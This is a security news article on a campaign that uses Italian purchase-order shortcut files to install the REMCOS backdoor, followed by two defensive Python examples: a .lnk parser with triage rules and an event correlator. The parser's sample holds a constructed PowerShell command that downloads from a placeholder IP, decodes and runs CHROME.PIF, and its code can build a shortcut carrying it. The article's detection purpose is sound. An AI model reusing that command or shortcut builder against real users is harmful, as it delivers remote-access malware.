AimactGrow

New Attack Uses Windows Shortcut Files to Install REMCOS Backdoor

Admin
August 3, 2025


A new and deceptive multi-stage malware campaign has been identified by the Lat61 Threat Intelligence team at security firm Point Wild. The attack relies on malicious Windows Shortcut (LNK) files. A shortcut is a small binary file that points at a program or document, but it can also carry a complete command line for that program, which is what makes it useful to an attacker; this campaign uses that capability to deliver the REMCOS remote-access trojan (RAT).

The research, led by Dr. Zulfikar Ramzan, CTO of Point Wild, and shared with Hackread.com, shows that the campaign begins with a seemingly harmless shortcut file, probably attached to an email, with a filename like “ORDINE-DI-ACQUIST-7263535” (Italian for “purchase order”, a typical invoice-themed lure).

When a user double-clicks it, the LNK file silently runs a PowerShell command in the background. PowerShell is the command-line shell and scripting engine that Windows uses for task automation; in this attack it is abused to download and decode a hidden payload.

The command is designed to download and decode the hidden payload without triggering security alerts or using Office macros, and the shortcut itself carries no payload, only the command line that fetches one (the decoded payload does end up on disk, as described below). The research provides file hashes for this LNK file, including MD5 ae8066bd5a66ce22f6a91bd935d4eee6, to aid detection. A hash matches only this exact sample, and a new shortcut can be generated in seconds, so detection should also key on the behaviour: a shortcut whose target is powershell.exe with download-and-decode arguments.
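To make that detection point concrete, here is an added example (not Point Wild's code or tooling) that parses the .lnk binary layout defined in MS-SHLLINK, recovers the target path and the embedded command line, and flags the traits described above. The shortcut it inspects is constructed inline: the target path, the exact PowerShell arguments, the 203.0.113.10 address and the C:\Users\Public drop path are assumptions made for the example, not indicators from the report; only the download, Base64 decode and CHROME.PIF elements come from the article.

```python
"""Static triage of a Windows Shell Link (.lnk): recover target and command line from the
MS-SHLLINK binary layout and flag the PowerShell download-and-decode pattern."""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-0000-0000-C000-000000000046
# LinkFlags bits that decide which optional structures follow the 76-byte header
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
# StringData fields occur in this fixed order, each present only when its flag is set
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
                 (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location"))
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Command-line traits worth flagging; the label is what the triage output reports
SUSPICIOUS_ARGS = (
    (r"-(?:e|ec|en|enc|encodedcommand)\s", "encoded command"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-(?:ep|ex\w*)\s+bypass", "execution policy bypass"),
    (r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b", "network download"),
    (r"frombase64string", "base64 decode"),
    (r"https?://", "embedded URL"),
    (r"\.pif\b", ".pif executable"),
)

def is_lnk(data: bytes) -> bool:
    """HeaderSize must be 0x4C and LinkCLSID must be the Shell Link CLSID."""
    return len(data) >= 76 and struct.unpack_from("<I", data)[0] == 0x4C and data[4:20] == LNK_CLSID

def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags plus the StringData fields (None where the flag is clear)."""
    if not is_lnk(data):
        raise ValueError("not a Shell Link (.lnk) file")
    try:
        flags = struct.unpack_from("<I", data, 20)[0]
        pos = 76                                          # end of ShellLinkHeader
        if flags & HAS_LINK_TARGET_ID_LIST:               # IDListSize (uint16) then the IDList
            pos += 2 + struct.unpack_from("<H", data, pos)[0]
        if flags & HAS_LINK_INFO:                         # LinkInfoSize (uint32) includes itself
            pos += struct.unpack_from("<I", data, pos)[0]
        out = {"flags": flags}
        for bit, key in STRING_FIELDS:
            if not flags & bit:
                out[key] = None
                continue
            count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos:pos + width * count]
            out[key] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
            pos += width * count
    except struct.error as exc:
        raise ValueError("truncated .lnk structure") from exc
    return out

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage_lnk(data: bytes):
    """Parse the shortcut and return (fields, findings); an empty findings list means no match."""
    info = parse_lnk(data)
    target, args = _basename(info["relative_path"] or ""), info["arguments"] or ""
    findings = []
    if target in SCRIPT_HOSTS:
        findings.append(f"target is a script host ({target})")
        icon = _basename(info["icon_location"] or "")
        if icon and icon != target:                       # borrowed icon hides what really runs
            findings.append(f"icon borrowed from {icon}")
    findings += [label for pat, label in SUSPICIOUS_ARGS if re.search(pat, args, re.IGNORECASE)]
    return info, findings

def build_sample_lnk(relative_path: str, arguments: str, icon_location: str) -> bytes:
    """Assemble a minimal, spec-shaped .lnk so the parser can be exercised offline."""
    flags = (HAS_LINK_TARGET_ID_LIST | HAS_LINK_INFO | HAS_RELATIVE_PATH
             | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE)
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0,            # FileAttributes, 3 FILETIMEs, FileSize, IconIndex
                         7, 0, 0, 0, 0)                  # ShowCommand=SW_SHOWMINNOACTIVE, HotKey, Reserved1-3
    id_list = struct.pack("<H", 4) + b"\x1f\x50" + b"\x00\x00"   # one dummy ItemID + TerminalID
    link_info = struct.pack("<7I", 28, 28, 0, 0, 0, 0, 0)        # header-only LinkInfo placeholder
    def string_data(s: str) -> bytes:                     # CountCharacters + UTF-16LE characters
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return (header + struct.pack("<H", len(id_list)) + id_list + link_info
            + string_data(relative_path) + string_data(arguments) + string_data(icon_location)
            + b"\x00\x00\x00\x00")                        # ExtraData TerminalBlock

# Constructed lure modelled on the chain described above; 203.0.113.10 is a documentation-only address
SAMPLE_TARGET = r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_ARGS = ('-NoP -W Hidden -Ep Bypass -c "$d=(New-Object Net.WebClient)'
               ".DownloadString('http://203.0.113.10/p.txt');"
               "[IO.File]::WriteAllBytes('C:\\Users\\Public\\CHROME.PIF',[Convert]::FromBase64String($d));"
               "Start-Process 'C:\\Users\\Public\\CHROME.PIF'\"")
SAMPLE_ICON = r"%SystemRoot%\System32\shell32.dll"
BENIGN_TARGET = BENIGN_ICON = r"C:\Program Files\Notepad++\notepad++.exe"
```

Running `triage_lnk(build_sample_lnk(SAMPLE_TARGET, SAMPLE_ARGS, SAMPLE_ICON))` reports the script-host target, the borrowed icon and six argument traits, while the Notepad++ shortcut built from `BENIGN_TARGET` produces no findings. The parser only walks the structures it needs (header, IDList, LinkInfo, StringData) and rejects anything shorter than the header or truncated mid-structure; a real triage tool would also read the ExtraData blocks, where the machine ID and NTFS object identifiers of the attacker's build host sometimes survive.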

The LNK file analysis (Source: Point Wild)

The Attack's Hidden Layers:

This campaign is built to be stealthy, using several layers of disguise. After the initial PowerShell command runs, it fetches a Base64-encoded payload from a remote server. This is a common way to hide malicious code in plain sight, since Base64 is a standard method for encoding binary data as text. It is encoding, not encryption: the payload is trivially recoverable once captured, and PowerShell script block logging (Event ID 4104) records the command that performs the decode as it executes.

Once the payload is downloaded and decoded, it is launched as a Program Information File (.PIF), a format originally used to describe how to run older MS-DOS programs. Windows treats a .PIF as executable and will run an ordinary Windows executable that has simply been renamed to .PIF, and Explorer never displays the .PIF extension regardless of the folder-view settings, so the attackers' CHROME.PIF shows up as “CHROME” and passes for a legitimate program.

This final step installs the REMCOS backdoor, giving the attackers full control of the compromised system. The malware also leaves a durable footprint: it creates a new Remcos folder under the %ProgramData% directory and writes its keystroke log there, an on-disk artifact that defenders can hunt for.
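For the behavioural side, this added example (again not Point Wild's code) correlates Sysmon-style process-creation and file-creation events into the stages described above: PowerShell started from a clicked shortcut with download or decode arguments, a .PIF written and then launched by that PowerShell, and a file appearing under %ProgramData%\Remcos. The events, host names, PIDs, command lines and paths are constructed for the example; the field names mirror Sysmon Event IDs 1 and 11, but the input is not real telemetry from the campaign.

```python
"""Correlate endpoint telemetry into the LNK -> PowerShell -> .PIF -> Remcos chain.
Event shape mirrors Sysmon Event ID 1 (process create) and 11 (file create); the events
below are constructed for this example and are not taken from the Point Wild report."""
import re
from collections import defaultdict

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
USER_LAUNCHERS = {"explorer.exe", "outlook.exe"}   # a clicked shortcut runs as a child of one of these
FETCH_OR_DECODE = re.compile(r"frombase64string|downloadstring|downloadfile|invoke-webrequest", re.I)
REMCOS_DIR = "c:\\programdata\\remcos\\"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    # WS01: user opens the shortcut; PowerShell decodes and drops CHROME.PIF, which starts logging keys
    {"id": 1, "host": "WS01", "pid": 4120, "ppid": 1880, "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell.exe -NoP -W Hidden -c "[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String($d));Start-Process $p"'},
    {"id": 11, "host": "WS01", "pid": 4120, "image": PS, "target": r"C:\Users\Public\CHROME.PIF"},
    {"id": 1, "host": "WS01", "pid": 4388, "ppid": 4120, "image": r"C:\Users\Public\CHROME.PIF",
     "parent_image": PS, "cmdline": r'"C:\Users\Public\CHROME.PIF"'},
    {"id": 11, "host": "WS01", "pid": 4388, "image": r"C:\Users\Public\CHROME.PIF", "target": r"C:\ProgramData\Remcos\logs.dat"},
    # WS02: scheduled maintenance script run by the service host; should not alert
    {"id": 1, "host": "WS02", "pid": 902, "ppid": 640, "image": PS, "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"id": 11, "host": "WS02", "pid": 902, "image": PS, "target": r"C:\Scripts\backup.log"},
]

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(events):
    """Apply one rule per stage of the chain; return (host, pid, rule) for every match."""
    hits = []
    for ev in events:
        img = basename(ev["image"])
        if ev["id"] == 1:
            parent = basename(ev["parent_image"])
            if img in SCRIPT_HOSTS and parent in USER_LAUNCHERS and FETCH_OR_DECODE.search(ev["cmdline"]):
                hits.append((ev["host"], ev["pid"], "user-launched script host with download/decode arguments"))
            if img.endswith(".pif") and parent in SCRIPT_HOSTS:
                hits.append((ev["host"], ev["pid"], "script host launched a .pif executable"))
        elif ev["id"] == 11:
            target = ev["target"].lower()
            if img in SCRIPT_HOSTS and target.endswith(".pif"):
                hits.append((ev["host"], ev["pid"], "script host wrote a .pif file"))
            if target.startswith(REMCOS_DIR):
                hits.append((ev["host"], ev["pid"], "file created under %ProgramData%\\Remcos"))
    return hits

def ancestry(events, host, pid):
    """Follow ppid links through the process-create events; returns images from root to pid."""
    procs = {(e["host"], e["pid"]): e for e in events if e["id"] == 1}
    chain, root = [], None
    while (host, pid) in procs:
        ev = procs[(host, pid)]
        chain.append(basename(ev["image"]))
        pid, root = ev["ppid"], basename(ev["parent_image"])
    if root:
        chain.append(root)                 # last known parent (e.g. explorer.exe) was never logged as a child
    return chain[::-1]

def correlate(events):
    """Per host, the set of distinct rules hit; two or more stages of the chain escalates to high."""
    per_host = defaultdict(set)
    for host, _pid, rule in evaluate(events):
        per_host[host].add(rule)
    return {host: ("high" if len(rules) >= 2 else "low") for host, rules in per_host.items()}
```

Keying the first rule on the parent process matters: the same PowerShell command line run by a scheduled task or a management agent has a different parent, which is why the WS02 events stay quiet, and `ancestry(SAMPLE_EVENTS, "WS01", 4388)` reconstructs explorer.exe, powershell.exe, chrome.pif for the analyst. In production the hits should be joined on a process GUID rather than a PID, since PIDs are reused, and the .PIF rules generalise to any executable extension written and launched by a script host.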

Infection workflow (Source: Point Wild)

What the REMCOS Backdoor Can Do

Once installed, the REMCOS backdoor grants the attackers extensive control over the victim's computer. The threat intelligence report notes that it can perform a wide range of malicious actions, including keylogging to steal passwords, opening a remote shell for direct access, and accessing the victim's files.

REMCOS also lets the attackers control the computer's webcam and microphone, enabling them to spy on the user. The research further found that the command-and-control (C2) infrastructure for this campaign is hosted in Romania and the United States.

This finding highlights the need for caution, since these attacks can originate from anywhere in the world. The researchers recommend that users remain wary of shortcut files from untrusted sources, double-check attachments before opening them, and run up-to-date antivirus software with real-time protection. For defenders, the chain described here also offers detection points beyond the file hash: PowerShell launched from a shortcut (typically as a child of explorer.exe or the mail client) with download-and-decode arguments, PowerShell writing and launching an executable with a .PIF extension, and a Remcos folder appearing under %ProgramData%.



Tags: Attack, backdoor, Files, Install, Remcos, shortcut, Windows



© 2025 https://blog.aimactgrow.com/ - All Rights Reserved
